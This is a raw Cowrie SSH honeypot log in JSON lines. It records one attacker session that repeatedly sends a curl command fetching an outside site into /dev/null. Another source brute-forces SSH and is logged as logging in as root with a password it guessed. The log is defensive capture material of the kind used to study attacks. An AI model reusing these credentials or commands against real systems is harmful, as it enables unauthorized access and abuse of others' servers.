{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.051871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"41.223.30.169","src_port":54490,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c997628c01f","protocol":"ssh","message":"New connection: 41.223.30.169:54490 (1.2.3.4:22) [session: 4c997628c01f]","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.073669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.074492Z","src_ip":"41.223.30.169","session":"4c997628c01f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.093568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.094437Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.213454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.214366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.218636Z","src_ip":"41.223.30.169","session":"4c997628c01f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.260892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.261826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.314829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.315702Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.352808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.353799Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.446295Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.447256Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.484048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.485462Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.611617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.612543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.650717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.651793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.689314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.690555Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.728122Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.729077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.766910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.767780Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.808403Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.809471Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.835648Z","src_ip":"41.223.30.169","session":"4c997628c01f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.853218Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.854001Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.895144Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.895920Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.965949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:09.966791Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.003636Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.004676Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.042911Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.043786Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.084061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.084898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.125598Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.126404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.210427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.211385Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.505109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.506011Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.668471Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.669410Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.705958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.706975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.798176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.799120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.837846Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.838774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.876368Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.877400Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.914286Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.915144Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.952398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.953290Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.983618Z","src_ip":"41.223.30.169","session":"4c997628c01f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:10.989377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:10.990409Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.027103Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.027935Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.067589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.068452Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.106861Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.107969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"41.223.30.169","src_port":54494,"dst_ip":"1.2.3.4","dst_port":22,"session":"104b5910f115","protocol":"ssh","message":"New connection: 41.223.30.169:54494 (1.2.3.4:22) [session: 104b5910f115]","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.126780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.127741Z","src_ip":"41.223.30.169","session":"104b5910f115"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.144244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.144958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.181184Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.182106Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.218860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.219686Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.261668Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.262530Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.271957Z","src_ip":"41.223.30.169","session":"104b5910f115"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.299698Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.300475Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.338940Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.339786Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.376898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.377738Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.463691Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.464543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.500805Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.501678Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.539925Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.540752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.581924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.582811Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.619759Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.620708Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.657017Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.657857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.695952Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.696901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.734339Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.735271Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.774203Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.775338Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.813092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.813937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.852889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.853743Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.889825Z","src_ip":"41.223.30.169","session":"104b5910f115"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.892560Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:11.893660Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:11.940925Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
